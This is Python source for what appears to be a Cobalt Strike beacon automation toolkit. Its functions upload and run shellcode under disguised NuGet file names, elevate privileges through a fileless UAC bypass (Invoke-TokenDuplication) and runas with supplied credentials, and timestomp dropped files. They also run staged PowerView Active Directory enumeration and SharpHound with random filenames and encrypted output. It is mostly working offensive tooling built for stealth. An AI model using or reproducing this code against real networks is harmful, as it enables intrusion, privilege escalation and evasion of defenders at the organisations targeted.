def elevate_shellcode_helper(bid, shellcode, function):
    """
    Run `shellcode` on beacon `bid` through the native helper binary,
    letting the caller decide how the command line is launched.

    Files written to the directory returned by helpers.guess_temp(bid):
      - NugetPackage.exe   (local tools/native.exe)
      - nuget.package      (`shellcode`, uploaded the same way)
    `function` is then called as function(bid, command) where command is
    '<helper path> <shellcode path>'. Both remote files are removed with
    brm before the upload (stale copies) and again afterwards; every file
    operation here is issued with silent=True.

    Args:
        bid: beacon id
        shellcode: local file handed to helpers.upload_to, like the helper
        function: callable taking (bid, command)
    """
    def in_temp(name):
        # '<guessed temp dir>\<name>' on the target
        return r'{}\{}'.format(helpers.guess_temp(bid), name)

    helper_local = utils.basedir('tools/native.exe')
    helper_remote = in_temp('NugetPackage.exe')
    payload_remote = in_temp('nuget.package')
    remote_files = (helper_remote, payload_remote)

    # remove leftovers from a previous run
    for path in remote_files:
        aggressor.brm(bid, path, silent=True)

    # stage helper and payload
    helpers.upload_to(bid, helper_local, helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, payload_remote, silent=True)

    # '<helper> <payload>' goes to the caller-supplied launcher
    function(bid, ' '.join(remote_files))

    # remove what was dropped
    for path in remote_files:
        aggressor.brm(bid, path, silent=True)
def elevate_runas_shellcode(bid, user, password, shellcode):
    """
    Elevate with token duplication bypass: run the native helper under
    another user's credentials via brunas.

    Files written to the directory returned by helpers.guess_temp(bid):
      - NugetPackage.<randstr>.exe   (local tools/native.exe)
      - nuget2.package               (`shellcode`)
    The helper is started with aggressor.brunas(bid, domain, user,
    password, helper_path). Both files are brm'd before the upload and
    again after brunas.

    Args:
        bid: beacon id
        user: 'DOMAIN\\user'; the domain part is required
        password: password for `user`
        shellcode: local file handed to helpers.upload_to

    Raises:
        RuntimeError: if `user` contains no backslash (no domain given)

    NOTE(review): nothing here passes the nuget2.package path to the
    helper; presumably the helper locates it itself - verify against
    tools/native.exe.
    """
    helper_local = utils.basedir('tools/native.exe')
    helper_remote = r'{}\NugetPackage.{}.exe'.format(
        helpers.guess_temp(bid), helpers.randstr())
    payload_remote = r'{}\nuget2.package'.format(helpers.guess_temp(bid))
    remote_files = (helper_remote, payload_remote)

    # remove leftovers from a previous run
    for path in remote_files:
        aggressor.brm(bid, path, silent=True)

    aggressor.blog2(bid, 'uploading to %s and %s' % remote_files)

    helpers.upload_to(bid, helper_local, helper_remote, silent=True)
    helpers.upload_to(bid, shellcode, payload_remote, silent=True)

    # NOTE: this check runs after the uploads; a `user` without a domain
    # raises here and the clean-up below is skipped.
    if '\\' not in user:
        raise RuntimeError('must specify user domain')
    domain, user = user.split('\\')

    aggressor.brunas(bid, domain, user, password, helper_remote)

    for path in remote_files:
        aggressor.brm(bid, path, silent=True)
def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass, using the C# shellcode runner
    as the binary launched by Invoke-TokenDuplication.

    Steps as written:
      1. import modules/FilelessUACBypass.ps1 into the beacon
      2. upload to the directory returned by helpers.guess_temp(bid):
           tools/execute_assembly.exe  -> NugetPackage.exe
           tools/execute_shellcode.exe -> Stage2.exe
           `shellcode`                 -> nuget.package
      3. bpowerpick 'Invoke-TokenDuplication -Binary <Stage2.exe>'
      4. brm all three files

    NOTE(review): only Stage2.exe appears in the command; NugetPackage.exe
    and nuget.package are uploaded but not referenced anywhere in this
    function, so `shellcode` is never passed to the runner here. Unlike
    the other elevate_* helpers, none of the calls use silent=True.

    Args:
        bid: beacon id
        shellcode: local file handed to helpers.upload_to
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    def in_temp(name):
        # '<guessed temp dir>\<name>' on the target
        return r'{}\{}'.format(helpers.guess_temp(bid), name)

    runner_local = utils.basedir('tools/execute_shellcode.exe')
    assembly_local = utils.basedir('tools/execute_assembly.exe')
    stage1 = in_temp('NugetPackage.exe')
    stage2 = in_temp('Stage2.exe')
    package = in_temp('nuget.package')

    helpers.upload_to(bid, assembly_local, stage1)
    helpers.upload_to(bid, runner_local, stage2)
    helpers.upload_to(bid, shellcode, package)

    launch = 'Invoke-TokenDuplication -Binary {}'.format(powershell_quote(stage2))
    aggressor.bpowerpick(bid, launch)

    for path in (stage1, stage2, package):
        aggressor.brm(bid, path)
def _(bid):
    """
    Upload tools/7za.exe to the beacon's guessed temp directory as
    7za.exe, call helpers.explorer_stomp on it, and record the remote
    path in the module global `_uploaded`.

    The name `_` suggests this is registered through a decorator outside
    this view - confirm before calling it directly.
    """
    global _uploaded
    remote = r'{}\7za.exe'.format(helpers.guess_temp(bid))
    local = utils.basedir('tools/7za.exe')
    helpers.upload_to(bid, local, remote)
    # presumably adjusts the dropped file's timestamps by name - verify
    helpers.explorer_stomp(bid, '7za.exe')
    _uploaded = remote
def _(bid):
    """
    Stage 3/3 of domain-enum: brm the ten *.domain output files from the
    beacon's guessed temp directory, in the order stage 1 created them.
    """
    temp = helpers.guess_temp(bid)
    aggressor.btask(
        bid, 'Tasked beacon to clean up files from domain-enum (stage 3/3)')

    # same list and order as the stage 1 script / stage 2 download
    outputs = (
        'objects',
        'policy',
        'sites',
        'subnets',
        'gpo_localgroups',
        'gpo_delegations',
        'gpo_acls',
        'trusts',
        'managers',
        'interesting_acls',
    )
    for stem in outputs:
        aggressor.brm(bid, r'{}\{}.domain'.format(temp, stem))
def _(bid):
    """
    Stage 2/3 of domain-enum: bdownload the ten *.domain output files from
    the beacon's guessed temp directory, in the order stage 1 created them.
    The files are left in place; stage 3 removes them.
    """
    temp = helpers.guess_temp(bid)
    aggressor.btask(
        bid,
        'Tasked beacon to download files from domain-enum (stage 2/3). Once finished run domain-enum-next2'
    )

    # same list and order as the stage 1 script / stage 3 clean-up
    outputs = (
        'objects',
        'policy',
        'sites',
        'subnets',
        'gpo_localgroups',
        'gpo_delegations',
        'gpo_acls',
        'trusts',
        'managers',
        'interesting_acls',
    )
    for stem in outputs:
        aggressor.bdownload(bid, r'{}\{}.domain'.format(temp, stem))
def _(bid):
    """
    Stage 1/3 of domain-enum: run a PowerView script on the beacon that
    writes ten *.domain files into the guessed temp directory (stage 2
    downloads them, stage 3 deletes them).

    The script is built with helpers.code_string from a template whose
    only placeholder is the cd target (powershell_quote(temp)); the `{{`
    `}}` pairs are literal braces for the Get-ObjectACL pipeline. It is
    run through external.run(bid, 'powerview', ...).
    """
    temp = helpers.guess_temp(bid)

    # Author's notes on cmdlets not (yet) included, kept for reference:
    #   Forests and trusts: Get-DomainTrustMapping, Get-ForestTrust,
    #                       Get-DomainTrust
    #   Parsing GPOs:       Get-GptTmpl, Get-GroupsXML
    #   File shares:        Get-DomainFileServer, Get-DomainDFSShare
    #   Get-DomainManagedSecurityGroup?
    # TODO remove subnet and site?
    # Computer objects don't show up in Get-DomainObject for some reason.
    script = r"""
        cd {}
        $FormatEnumerationLimit=-1
        Get-DomainObject | Format-List -Property * > objects.domain
        Get-DomainPolicyData | Format-List -Property * > policy.domain
        Get-DomainSite | Format-List -Property * > sites.domain
        Get-DomainSubnet | Format-List -Property * > subnets.domain
        Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain
        Get-GPODelegation | Format-List -Property * > gpo_delegations.domain
        Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain
        Get-DomainTrustMapping | Format-List -Property * > trusts.domain
        Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain
        Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain
        echo "All finished with domain-enum. Run domain-enum-next."
    """
    command = helpers.code_string(script.format(powershell_quote(temp)))

    aggressor.btask(
        bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)')
    external.run(bid, 'powerview', command)
def run_sharphound(bid, args, silent=False):
    """
    Invoke the 'sharphound-raw' command on the beacon with a fixed set of
    options prepended to the caller's `args`.

    The forced options are --RandomFilenames, --EncryptZip and
    --JsonFolder <directory from helpers.guess_temp(bid)>; `args` (any
    iterable of strings) follows them on the command line. Delegates to
    run(bid, 'sharphound-raw', argv, silent=silent).

    Args:
        bid: beacon id
        args: extra arguments appended after the forced options
        silent: passed through to run()
    """
    temp = helpers.guess_temp(bid)
    forced = ['--RandomFilenames', '--EncryptZip', '--JsonFolder', temp]
    run(bid, 'sharphound-raw', [*forced, *args], silent=silent)